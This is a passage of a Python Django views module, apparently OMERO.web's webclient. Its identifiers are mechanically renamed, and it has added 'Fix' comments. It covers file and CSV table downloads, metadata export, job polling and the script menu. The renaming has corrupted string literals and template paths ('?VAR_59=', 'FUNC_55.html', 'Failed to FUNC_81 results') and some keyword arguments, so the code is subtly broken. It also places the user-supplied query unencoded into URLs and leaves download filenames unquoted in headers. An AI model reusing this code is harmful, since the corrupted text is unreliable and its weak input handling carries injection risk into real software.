        )
    VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
    VAR_174.conn = VAR_6
    VAR_175 = VAR_173.mimetype
    if VAR_175 == "text/x-python":
        VAR_175 = "text/plain"  # allows display in browser
    VAR_174["Content-Type"] = VAR_175
    VAR_174["Content-Length"] = VAR_173.getSize()
    if VAR_31:
        # Sanitise the filename for the Content-Disposition header.
        VAR_300 = VAR_173.name.replace(" ", "_")
        # BUG FIX: was "downloadName.replace(...)" — an undefined name
        # (NameError); the local is VAR_300.
        VAR_300 = VAR_300.replace(",", ".")
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
    return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_55(VAR_2, VAR_32, VAR_33=None, VAR_6=None, **VAR_7):
    """Query an OMERO.table (OriginalFile id VAR_32) and return it as a page
    context, JSON, or a streamed CSV download (VAR_33 == "csv").

    GET params read here: query (default "*"), offset, limit, and
    header ("false" suppresses the CSV header row).
    """
    VAR_176 = VAR_2.GET.get("query", "*")
    VAR_177 = FUNC_0(VAR_2, "offset", 0)
    VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)

    # iviewer app is optional; link is None when it isn't installed
    VAR_178 = None
    try:
        VAR_178 = VAR_352("omero_iviewer_index")
    except NoReverseMatch:
        pass

    VAR_32 = VAR_241(VAR_32)
    VAR_173 = VAR_6.getObject("OriginalFile", VAR_32)
    if VAR_173 is None:
        raise Http404("OriginalFile %s not found" % VAR_32)
    VAR_179 = VAR_33 == "csv"
    # Fix: keyword values previously referenced undefined names
    # (conn/query/offset/limit/lazy). _table_query is the external
    # webgateway helper, so its keyword names are the plain ones.
    VAR_53 = webgateway_views._table_query(
        VAR_2, VAR_32, conn=VAR_6, query=VAR_176, offset=VAR_177,
        limit=VAR_88, lazy=VAR_179
    )
    if VAR_53.get("error") or not VAR_53.get("data"):
        return JsonResponse(VAR_53)
    if VAR_33 == "csv":
        VAR_301 = VAR_53.get("data")
        VAR_302 = VAR_2.GET.get("header") == "false"

        def FUNC_88():
            # Stream the CSV: optional header row, then lazily-fetched rows.
            if not VAR_302:
                VAR_405 = ",".join(VAR_301.get("columns"))
                yield VAR_405
            for rows in VAR_301.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([VAR_347(VAR_364) for VAR_364 in VAR_378]) for VAR_378 in rows])
                )

        VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
        # Fix: previously referenced the undefined name `downloadName`
        VAR_300 = VAR_300 + ".csv"
        VAR_174 = TableClosingHttpResponse(FUNC_88(), content_type="text/csv")
        VAR_174.conn = VAR_6
        VAR_174.table = VAR_53.get("table")
        VAR_174["Content-Type"] = "application/force-download"
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
        return VAR_174

    VAR_53["data"]["name"] = VAR_173.name
    VAR_53["data"]["path"] = VAR_173.path
    VAR_53["data"]["id"] = VAR_32
    VAR_53["meta"]["query"] = VAR_176
    # only report a page number when offset is a whole number of pages
    if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
        VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
    # Fix: next/prev URLs point back at this view, which reads the GET
    # params "limit"/"query"/"offset" (above) - the query strings were
    # previously mangled ("?VAR_88=..." etc.).
    VAR_5 = VAR_352("omero_table", args=[VAR_32])
    VAR_53["meta"]["url"] = VAR_5
    VAR_5 += "?limit=%s" % VAR_88
    if VAR_176 != "*":
        VAR_5 += "&query=%s" % VAR_176
    if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
        VAR_53["meta"]["next"] = VAR_5 + "&offset=%s" % (VAR_177 + VAR_88)
    if VAR_177 > 0:
        VAR_53["meta"]["prev"] = VAR_5 + "&offset=%s" % (max(0, VAR_177 - VAR_88))
    if VAR_33 is None:
        VAR_53["template"] = "webclient/annotations/FUNC_55.html"
        VAR_53["iviewer_url"] = VAR_178
        VAR_303 = VAR_53["data"]["column_types"]
        if "ImageColumn" in VAR_303:
            VAR_53["image_column_index"] = VAR_303.index("ImageColumn")
        if "WellColumn" in VAR_303:
            VAR_53["well_column_index"] = VAR_303.index("WellColumn")
        if "RoiColumn" in VAR_303:
            VAR_53["roi_column_index"] = VAR_303.index("RoiColumn")
        VAR_304 = [VAR_390.lower() for VAR_390 in VAR_53["data"]["columns"]]
        if "shape" in VAR_304 and VAR_303[VAR_304.index("shape")] == "LongColumn":
            VAR_53["shape_column_index"] = VAR_304.index("shape")
        # Pick an example numeric column (no spaces in name, >= 2 values)
        # that the template can use for filter-input hints.
        for idx, VAR_23 in enumerate(VAR_303):
            if VAR_23 in ("DoubleColumn", "LongColumn"):
                VAR_406 = VAR_53["data"]["columns"][idx]
                VAR_407 = []
                for VAR_378 in VAR_53["data"]["rows"]:
                    if VAR_378[idx]:
                        VAR_407.append(VAR_378[idx])
                    if len(VAR_407) > 3:
                        break
                if " " in VAR_406 or len(VAR_407) < 2:
                    continue
                VAR_53["example_column"] = VAR_406
                VAR_53["example_min_value"] = min(VAR_407)
                VAR_53["example_max_value"] = max(VAR_407)
                break
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_56(VAR_2, VAR_34, VAR_6=None, **VAR_7):
    """Stream the file attached to FileAnnotation VAR_34 as a forced download."""
    annotation = VAR_6.getObject("FileAnnotation", VAR_34)
    if annotation is None:
        return handlerInternalError(
            VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
        )
    chunks = annotation.getFileInChunks(buf=settings.CHUNK_SIZE)
    rsp = ConnCleaningHttpResponse(chunks)
    rsp.conn = VAR_6  # connection is cleaned up when streaming finishes
    safe_name = annotation.getFileName().replace(" ", "_")
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = annotation.getFileSize()
    rsp["Content-Disposition"] = "attachment; filename=%s" % (safe_name)
    return rsp
@login_required()
def FUNC_57(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Download an Image's original (global + series) metadata as plain text."""
    image = VAR_6.getObject("Image", VAR_26)
    if image is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    metadata = image.loadOriginalMetadata()
    lines = ["[Global Metadata]"]
    lines.extend("%s=%s" % (kv[0], kv[1]) for kv in metadata[1])
    lines.append("[Series Metadata]")
    lines.extend("%s=%s" % (kv[0], kv[1]) for kv in metadata[2])
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def FUNC_58(VAR_2, VAR_6=None, **VAR_7):
    """Build the 'download placeholder' dialog context.

    Lists the original files that downloading (or exporting, when ?format=
    is given) the selected images/wells would include, plus the URL the
    dialog should POST/GET to start the actual download.
    """
    VAR_184 = VAR_2.GET.get("format", None)
    if VAR_184 is not None:
        VAR_191 = VAR_352("download_as")
        VAR_305 = "Export_as_%s" % VAR_184
    else:
        VAR_191 = VAR_352("archived_files")
        VAR_305 = "OriginalFileDownload"
    VAR_185 = VAR_2.GET.get("ids")  # E.g. image-1|image-2
    VAR_186 = VAR_2.GET.get("name", VAR_305)  # default zip name
    VAR_186 = os.path.basename(VAR_186)  # remove path
    if VAR_185 is None:
        # Fix: message previously showed mangled parameter names; the GET
        # param actually read above is "ids" with "image-"/"well-" prefixes.
        raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
    VAR_187 = VAR_185.split("|")
    VAR_188 = []
    VAR_189 = 0
    VAR_190 = 0
    if VAR_184 is None:
        # Downloading original archived files: gather one file-list per
        # fileset, de-duplicating filesets and files across images.
        VAR_306 = []
        VAR_214 = []
        for VAR_320 in VAR_187:
            if VAR_320.split("-")[0] == "image":
                VAR_306.append(VAR_320.split("-")[1])
            elif VAR_320.split("-")[0] == "well":
                VAR_214.append(VAR_320.split("-")[1])
        VAR_106 = []
        if VAR_306:
            VAR_106 = list(VAR_6.getObjects("Image", VAR_306))
        if len(VAR_106) == 0:
            raise Http404("No images found.")
        VAR_307 = set()  # fileset ids already handled
        VAR_308 = set()  # file ids already counted
        for VAR_142 in VAR_106:
            VAR_365 = VAR_142.getFileset()
            if VAR_365 is not None:
                if VAR_365.id in VAR_307:
                    continue
                VAR_307.add(VAR_365.id)
            VAR_284 = list(VAR_142.getImportedImageFiles())
            VAR_366 = []
            for f in VAR_284:
                if f.id in VAR_308:
                    continue
                VAR_308.add(f.id)
                VAR_366.append({"id": f.id, "name": f.name, "size": f.getSize()})
                VAR_190 += f.getSize()
            if len(VAR_366) > 0:
                VAR_188.append(VAR_366)
        VAR_189 = sum([len(VAR_366) for VAR_366 in VAR_188])
    else:
        VAR_189 = len(VAR_187)
    # "image-1" -> "image=1" query pairs for the download view
    VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
    # Fix: both statements previously referenced the undefined name
    # `download_url`; they extend the reversed URL built above.
    VAR_191 = VAR_191 + "?" + VAR_176
    if VAR_184 is not None:
        VAR_191 = VAR_191 + "&format=%s" % VAR_184
    VAR_53 = {
        "template": "webclient/annotations/FUNC_58.html",
        "url": VAR_191,
        "defaultName": VAR_186,
        "fileLists": VAR_188,
        "fileCount": VAR_189,
        "filesTotalSize": VAR_190,
    }
    if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35=None, VAR_36=None, VAR_6=None, **VAR_7):
    """Render the history calendar for year VAR_35 / month VAR_36
    (defaults to today's year/month when either is missing)."""
    VAR_54 = "webclient/history/calendar.html"
    VAR_192 = VAR_2.session.get("user_id")
    # Fix: keyword values previously referenced undefined names
    # (conn/year/month). BaseCalendar is an external controller class, so
    # its keyword names are the plain conn/year/month/eid ones.
    if VAR_35 is not None and VAR_36 is not None:
        VAR_193 = BaseCalendar(conn=VAR_6, year=VAR_35, month=VAR_36, eid=VAR_192)
    else:
        VAR_309 = datetime.datetime.today()
        VAR_193 = BaseCalendar(
            conn=VAR_6, year=VAR_309.year, month=VAR_309.month, eid=VAR_192
        )
    VAR_193.create_calendar()
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_60(VAR_2, VAR_35, VAR_36, VAR_37, VAR_6=None, **VAR_7):
    """Render the detailed history list for one day (VAR_35/VAR_36/VAR_37 =
    year/month/day), paginated via the ?page= GET param."""
    if VAR_35 is None or VAR_36 is None or VAR_37 is None:
        raise Http404("Year, month, and day are required")
    VAR_54 = "webclient/history/history_details.html"
    VAR_87 = int(VAR_2.GET.get("page", 1))
    VAR_192 = VAR_2.session.get("user_id")
    # Fix: keyword values previously referenced undefined names
    # (conn/year/month/day); BaseCalendar is an external controller class.
    VAR_193 = BaseCalendar(
        conn=VAR_6, year=VAR_35, month=VAR_36, day=VAR_37, eid=VAR_192
    )
    VAR_193.get_items(VAR_87)
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
def FUNC_61(VAR_6, VAR_38):
    """Return a 'userdata' browse URL for VAR_38.

    For a FileAnnotation, the URL points at its first project/dataset/image
    parent instead. When the (possibly substituted) object is one of the
    supported model types, a show-parameter is appended to the URL.
    """
    url = VAR_352(viewname="load_template", args=["userdata"])
    if isinstance(VAR_38, omero.model.FileAnnotationI):
        annotation = VAR_6.getObject("Annotation", VAR_38.id.val)
        for parent_type in ["project", "dataset", "image"]:
            links = list(annotation.getParentLinks(parent_type))
            if links:
                VAR_38 = links[0].parent
                break
    kls = VAR_38.__class__.__name__
    supported = (
        "ImageI",
        "DatasetI",
        "ProjectI",
        "ScreenI",
        "PlateI",
        "WellI",
    )
    if kls in supported:
        url += "?VAR_59=%s-%s" % (kls[:-1].lower(), VAR_38.id.val)
    return url
def FUNC_62(VAR_2, VAR_39, **VAR_7):
    """Merge the given keyword arguments into the session 'callback' entry
    for job key VAR_39 (overwriting any existing values)."""
    entry = VAR_2.session["callback"][VAR_39]
    entry.update(VAR_7)
@login_required()
@render_response()
def FUNC_63(VAR_2, VAR_6=None, **VAR_7):
    """Poll background jobs tracked in VAR_2.session["callback"].

    Three request styles are handled:
      * GET with ?jobId=...  - return the status of that single graph job;
      * DELETE with a jobId in the JSON body - cancel that job;
      * plain GET - poll every tracked job (chgrp/chown, send_email, delete,
        script), update the session entries via FUNC_62, and return a summary
        context (or JSON when VAR_7["template"] == "json").
    """
    VAR_195 = 0  # jobs still in progress
    VAR_196 = 0  # jobs that have failed
    VAR_197 = []  # job keys whose results became available this poll
    _purgeCallback(VAR_2)

    # Single-job status query (job need not be in the session)
    VAR_198 = VAR_2.GET.get("jobId", None)
    if VAR_198 is not None:
        VAR_198 = VAR_347(VAR_198)
        try:
            VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
            VAR_315 = VAR_367.getStatus()
            VAR_0.debug("job VAR_315: %s", VAR_315)
            VAR_174 = VAR_367.getResponse()
            if VAR_174 is not None:
                VAR_172 = graphResponseMarshal(VAR_6, VAR_174)
                VAR_172["finished"] = True
            else:
                VAR_172 = {"finished": False}
                VAR_172["status"] = {
                    "currentStep": VAR_315.currentStep,
                    "steps": VAR_315.steps,
                    "startTime": VAR_315.startTime,
                    "stopTime": VAR_315.stopTime,
                }
        except IceException:
            # handle no longer exists on the server - treat as finished
            VAR_172 = {"finished": True}
        return VAR_172
    elif VAR_2.method == "DELETE":
        # Cancel a running job
        try:
            VAR_17 = json.loads(VAR_2.body)
        except TypeError:
            VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
        VAR_198 = VAR_17.get("jobId", None)
        if VAR_198 is not None:
            VAR_198 = VAR_347(VAR_198)
            VAR_172 = {"jobId": VAR_198}
            try:
                VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
                VAR_315 = VAR_367.getStatus()
                VAR_0.debug("pre-cancel() job VAR_315: %s", VAR_315)
                VAR_172["status"] = {
                    "currentStep": VAR_315.currentStep,
                    "steps": VAR_315.steps,
                    "startTime": VAR_315.startTime,
                    "stopTime": VAR_315.stopTime,
                }
                VAR_367.cancel()
            except omero.LockTimeout:
                VAR_0.info("Timeout on VAR_367.cancel()")
            return VAR_172

    # Poll every job tracked in the session.
    # NOTE: FUNC_62 kwargs below were fixed from mangled names (VAR_315=,
    # VAR_57=) to status=/error= so they match the session keys that this
    # function and FUNC_64 actually read ("status", "error").
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_313 = VAR_2.session["callback"][VAR_39]
        VAR_314 = VAR_313["job_type"]
        VAR_315 = VAR_313["status"]
        if VAR_315 == "failed":
            VAR_196 += 1
        VAR_2.session.modified = True

        if VAR_314 in ("chgrp", "chown"):
            if VAR_315 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_367 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_174 = VAR_367.getResponse()
                    VAR_431 = False  # close the handle only once we have a response
                    try:
                        if VAR_174 is not None:
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_447 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_415, VAR_416)
                                        for VAR_415, VAR_416 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error(
                                    "%s failed with: %s" % (VAR_314, VAR_447)
                                )
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    status="failed",
                                    report="%s %s" % (VAR_174.name, VAR_447),
                                    error=1,
                                )
                            elif isinstance(VAR_174, omero.cmd.OK):
                                FUNC_62(VAR_2, VAR_39, status="finished")
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_367.close(VAR_431)
                except Exception:
                    VAR_0.info(
                        "Activities %s VAR_84 not found: %s" % (VAR_314, VAR_39)
                    )
                    continue
        elif VAR_314 == "send_email":
            if VAR_315 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_367 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_444 = omero.callbacks.CmdCallbackI(
                        VAR_6.c, VAR_367, foreground_poll=True
                    )
                    VAR_174 = VAR_444.getResponse()
                    VAR_431 = False
                    try:
                        if VAR_174 is not None:
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_447 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_415, VAR_416)
                                        for VAR_415, VAR_416 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error("send_email failed with: %s" % VAR_447)
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    status="failed",
                                    report={"error": VAR_447},
                                    error=1,
                                )
                            else:
                                VAR_450 = (
                                    VAR_174.success
                                    + len(VAR_174.invalidusers)
                                    + len(VAR_174.invalidemails)
                                )
                                # NOTE(review): session key "VAR_174" (kwarg
                                # name) is read by the template; its original
                                # name is not visible here - left unchanged.
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    status="finished",
                                    VAR_174={"success": VAR_174.success, "total": VAR_450},
                                )
                                if (
                                    len(VAR_174.invalidusers) > 0
                                    or len(VAR_174.invalidemails) > 0
                                ):
                                    VAR_453 = [
                                        e.getFullName()
                                        for e in list(
                                            VAR_6.getObjects(
                                                "Experimenter", VAR_174.invalidusers
                                            )
                                        )
                                    ]
                                    FUNC_62(
                                        VAR_2,
                                        VAR_39,
                                        report={
                                            "invalidusers": VAR_453,
                                            "invalidemails": VAR_174.invalidemails,
                                        },
                                    )
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_444.close(VAR_431)
                except Exception:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
        elif VAR_314 == "delete":
            if VAR_315 not in ("failed", "finished"):
                try:
                    VAR_84 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_446 = omero.callbacks.CmdCallbackI(
                        VAR_6.c, VAR_84, foreground_poll=True
                    )
                    VAR_174 = VAR_446.getResponse()
                    VAR_431 = False
                    try:
                        if not VAR_174:  # Response not available
                            FUNC_62(
                                VAR_2,
                                VAR_39,
                                error=0,
                                status="in progress",
                                dreport=_formatReport(VAR_84),
                            )
                            VAR_195 += 1
                        else:  # Response available
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            VAR_174 = VAR_446.getResponse()
                            VAR_451 = isinstance(VAR_174, omero.cmd.ERR)
                            if VAR_451:
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    error=1,
                                    status="failed",
                                    dreport=_formatReport(VAR_84),
                                )
                                VAR_196 += 1
                            else:
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    error=0,
                                    status="finished",
                                    dreport=_formatReport(VAR_84),
                                )
                    finally:
                        VAR_446.close(VAR_431)
                except Ice.ObjectNotExistException:
                    FUNC_62(
                        VAR_2, VAR_39, error=0, status="finished", dreport=None
                    )
                except Exception as x:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.error("Status job '%s'error:" % VAR_39)
                    FUNC_62(
                        VAR_2, VAR_39, error=1, status="failed", dreport=VAR_347(x)
                    )
                    VAR_196 += 1
        elif VAR_314 == "script":
            if not VAR_39.startswith("ProcessCallback"):
                continue  # ignore
            if VAR_315 not in ("failed", "finished"):
                VAR_0.info("Check VAR_444 on script: %s" % VAR_39)
                try:
                    VAR_448 = omero.grid.ScriptProcessPrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                except IceException:
                    FUNC_62(
                        VAR_2,
                        VAR_39,
                        status="failed",
                        Message="No process found for job",
                        error=1,
                    )
                    continue
                VAR_446 = omero.scripts.ProcessCallbackI(VAR_6.c, VAR_448)
                if VAR_446.block(0):  # ms.
                    VAR_446.close()
                    try:
                        VAR_452 = VAR_448.getResults(0, VAR_6.SERVICE_OPTS)
                        FUNC_62(VAR_2, VAR_39, status="finished")
                        VAR_197.append(VAR_39)
                    except Exception:
                        FUNC_62(
                            VAR_2,
                            VAR_39,
                            status="finished",
                            Message="Failed to FUNC_81 results",
                        )
                        VAR_0.info("Failed on VAR_448.getResults() for OMERO.script")
                        continue
                    # Marshal script outputs: stdout/stderr/Message go
                    # straight into the session; other values become
                    # {id, type, browse_url, ...} dicts for the template.
                    VAR_449 = {}
                    for VAR_312, VAR_375 in VAR_452.items():
                        VAR_416 = VAR_375.getValue()
                        if VAR_312 in ("stdout", "stderr", "Message"):
                            if VAR_312 in ("stderr", "stdout"):
                                VAR_416 = VAR_416.id.val  # store the file id
                            VAR_454 = {VAR_312: VAR_416}
                            FUNC_62(VAR_2, VAR_39, **VAR_454)
                        else:
                            if hasattr(VAR_416, "id"):
                                VAR_456 = {
                                    "id": VAR_416.id.val,
                                    "type": VAR_416.__class__.__name__[:-1],
                                }
                                VAR_456["browse_url"] = FUNC_61(VAR_6, VAR_416)
                                if VAR_416.isLoaded() and hasattr(VAR_416, "file"):
                                    VAR_458 = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if VAR_416.file.mimetype.val in VAR_458:
                                        VAR_456["fileType"] = VAR_458[
                                            VAR_416.file.mimetype.val
                                        ]
                                        VAR_456["fileId"] = VAR_416.file.id.val
                                    VAR_456["name"] = VAR_416.file.name.val
                                if VAR_416.isLoaded() and hasattr(VAR_416, "name"):
                                    VAR_3 = unwrap(VAR_416.name)
                                    if VAR_3 is not None:
                                        VAR_456["name"] = VAR_3
                                VAR_449[VAR_312] = VAR_456
                            else:
                                VAR_449[VAR_312] = unwrap(VAR_416)
                    FUNC_62(VAR_2, VAR_39, VAR_452=VAR_449)
                else:
                    VAR_195 += 1

    # Snapshot the session entries for the response
    VAR_172 = {}
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])

    if "template" in VAR_7 and VAR_7["template"] == "json":
        for VAR_39 in VAR_2.session.get("callback").keys():
            VAR_172[VAR_39]["start_time"] = VAR_347(
                VAR_2.session["callback"][VAR_39]["start_time"]
            )
        VAR_172["inprogress"] = VAR_195
        VAR_172["failure"] = VAR_196
        VAR_172["jobs"] = len(VAR_2.session["callback"])
        return JsonResponse(VAR_172)  # json

    VAR_199 = []
    VAR_200 = False
    for VAR_312, VAR_158 in VAR_172.items():
        # Derive an html-usable id from the job key (uuid part of the proxy)
        if len(VAR_312.split(" ")) > 0:
            VAR_368 = VAR_312.split(" ")[0]
            if len(VAR_368.split("/")) > 1:
                # Fix: previously referenced the undefined name `htmlId`
                VAR_368 = VAR_368.split("/")[1]
        VAR_172[VAR_312]["id"] = VAR_368
        VAR_172[VAR_312]["key"] = VAR_312
        if VAR_312 in VAR_197:
            VAR_172[VAR_312]["new"] = True
        if "error" in VAR_158 and VAR_158["error"] > 0:
            VAR_200 = True
        VAR_199.append(VAR_172[VAR_312])

    # Fix: list.sort() only accepts the 'key' and 'reverse' keyword args
    VAR_199.sort(key=lambda x: x["start_time"], reverse=True)
    VAR_53 = {
        "sizeOfJobs": len(VAR_2.session["callback"]),
        "jobs": VAR_199,
        "inprogress": VAR_195,
        "new_results": len(VAR_197),
        "new_errors": VAR_200,
        "failure": VAR_196,
    }
    VAR_53["template"] = "webclient/FUNC_63/activitiesContent.html"
    return VAR_53
@login_required()
def FUNC_64(VAR_2, VAR_27, **VAR_7):
    """Remove finished jobs from the session 'callback' table.

    With a POSTed jobKey, remove just that entry and report whether it was
    found (JSON); otherwise remove every entry whose status is no longer
    "in progress" and return a plain "OK".
    """
    VAR_2.session.modified = True
    if VAR_27 == "clean":
        if "jobKey" in VAR_2.POST:
            job_key = VAR_2.POST.get("jobKey")
            payload = {"removed": False}
            if job_key in VAR_2.session["callback"]:
                del VAR_2.session["callback"][job_key]
                VAR_2.session.modified = True
                payload["removed"] = True
            return JsonResponse(payload)
        # No specific key: sweep all completed/failed jobs
        for job_key, info in list(VAR_2.session["callback"].items()):
            if info["status"] != "in progress":
                del VAR_2.session["callback"][job_key]
    return HttpResponse("OK")
@login_required()
def FUNC_65(VAR_2, VAR_40=None, VAR_6=None, **VAR_7):
    """Serve the experimenter's avatar photo as a JPEG response."""
    photo = VAR_6.getExperimenterPhoto(VAR_40)
    return HttpResponse(photo, content_type="image/jpeg")
@login_required()
def FUNC_66(VAR_2, VAR_41, VAR_25=None, **VAR_7):
    """Delegate to the webgateway full viewer, pointing the viewport at this
    server (optionally suffixed with VAR_25), without a trailing slash."""
    base = VAR_352("webindex")
    server = VAR_25 is not None and base + VAR_25 or base
    VAR_7["viewport_server"] = server.rstrip("/")
    return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_7)
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_6=None, **VAR_7):
    """Build a nested menu of all server-side scripts.

    Scripts are grouped by their path components into nested dicts, then
    converted to sorted lists of {"name": ..., "ul": [...]} /
    {"name": ..., "id": ...} entries for the menu template. Scripts listed
    in the server setting "scripts_to_ignore" are skipped.
    """
    VAR_202 = VAR_6.getScriptService()
    VAR_203 = VAR_202.getScripts()
    VAR_204 = {}
    VAR_205 = (
        VAR_2.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in VAR_203:
        VAR_42 = s.id.val
        VAR_316 = s.path.val
        VAR_3 = s.name.val
        VAR_317 = os.path.join(VAR_316, VAR_3)
        if VAR_317 in VAR_205:
            VAR_0.info("Ignoring script %r" % VAR_317)
            continue
        # Walk/extend the nested dict along this script's path components;
        # the leaf component maps to the script id.
        # Fix: the walker variable was previously split between two names
        # (`ul` assigned, `VAR_206` read), leaving the first read undefined.
        VAR_206 = VAR_204
        VAR_318 = VAR_317.split(os.path.sep)
        for li, VAR_364 in enumerate(VAR_318):
            if len(VAR_364) == 0:
                continue
            if VAR_364 not in VAR_206:
                if li + 1 == len(VAR_318):
                    VAR_206[VAR_364] = VAR_42
                else:
                    VAR_206[VAR_364] = {}
            VAR_206 = VAR_206[VAR_364]

    def FUNC_85(VAR_206):
        # Convert a nested dict into a sorted list of menu entries.
        VAR_319 = []
        for VAR_3, VAR_375 in VAR_206.items():
            if isinstance(VAR_375, dict):
                VAR_319.append({"name": VAR_3, "ul": FUNC_85(VAR_375)})
            else:
                VAR_319.append({"name": VAR_3, "id": VAR_375})
        # Fix: list.sort() keyword is 'key'
        VAR_319.sort(key=lambda x: x["name"].lower())
        return VAR_319

    VAR_207 = FUNC_85(VAR_204)
    if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
        # Fix: previously referenced the undefined name `scriptList`
        VAR_207 = VAR_207[0]["ul"]
    return VAR_207
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_42, VAR_6=None, **VAR_7):
    """Build the script-dialog context for script VAR_42.

    Marshals the script's parameters (names, defaults, min/max, options,
    grouping) into a structure the webclient UI template can render,
    pre-populating IDs / Data_Type from the request GET params.
    """
    VAR_202 = VAR_6.getScriptService()
    try:
        VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
    except Exception as ex:
        # Fix: Python 3 exceptions have no `.message` attribute
        if str(ex).lower().startswith("no processor available"):
            return {
                "template": "webclient/VAR_203/no_processor.html",
                "scriptId": VAR_42,
            }
        raise ex
    if VAR_73 is None:
        return HttpResponse()
    VAR_208 = {}
    VAR_208["id"] = VAR_241(VAR_42)
    VAR_208["name"] = VAR_73.name.replace("_", " ")
    VAR_208["description"] = VAR_73.description
    VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
    VAR_208["contact"] = VAR_73.contact
    VAR_208["version"] = VAR_73.version
    VAR_208["institutions"] = ", ".join([VAR_320 for VAR_320 in VAR_73.institutions])
    VAR_209 = []  # use a list so we can sort by 'grouping'
    VAR_210 = None  # the Data_Type param, if present
    VAR_211 = None  # the IDs param, if present
    for VAR_312, VAR_322 in VAR_73.inputs.items():
        VAR_320 = {}
        VAR_320["name"] = VAR_312.replace("_", " ")
        VAR_320["key"] = VAR_312
        if not VAR_322.optional:
            VAR_320["required"] = True
        VAR_320["description"] = VAR_322.description
        if VAR_322.min:
            VAR_320["min"] = VAR_347(VAR_322.min.getValue())
        if VAR_322.max:
            VAR_320["max"] = VAR_347(VAR_322.max.getValue())
        if VAR_322.values:
            VAR_320["options"] = [VAR_416.getValue() for VAR_416 in VAR_322.values.getValue()]
        if VAR_322.useDefault:
            VAR_320["default"] = unwrap(VAR_322.prototype)
            if isinstance(VAR_320["default"], omero.model.IObject):
                VAR_320["default"] = None
        VAR_321 = unwrap(VAR_322.prototype)
        if VAR_321.__class__.__name__ == "dict":
            VAR_320["map"] = True
        elif VAR_321.__class__.__name__ == "list":
            VAR_320["list"] = True
            if "default" in VAR_320:
                VAR_320["default"] = ",".join([VAR_347(VAR_364) for VAR_364 in VAR_320["default"]])
        elif isinstance(VAR_321, bool):
            VAR_320["boolean"] = True
        elif isinstance(VAR_321, int) or isinstance(VAR_321, VAR_241):
            VAR_320["number"] = "number"
        elif isinstance(VAR_321, float):
            VAR_320["number"] = "float"
        # a GET param matching the input key overrides the default
        if VAR_2.GET.get(VAR_312, None) is not None:
            VAR_320["default"] = VAR_2.GET.get(VAR_312, None)
        VAR_320["prototype"] = unwrap(VAR_322.prototype)
        VAR_320["grouping"] = VAR_322.grouping
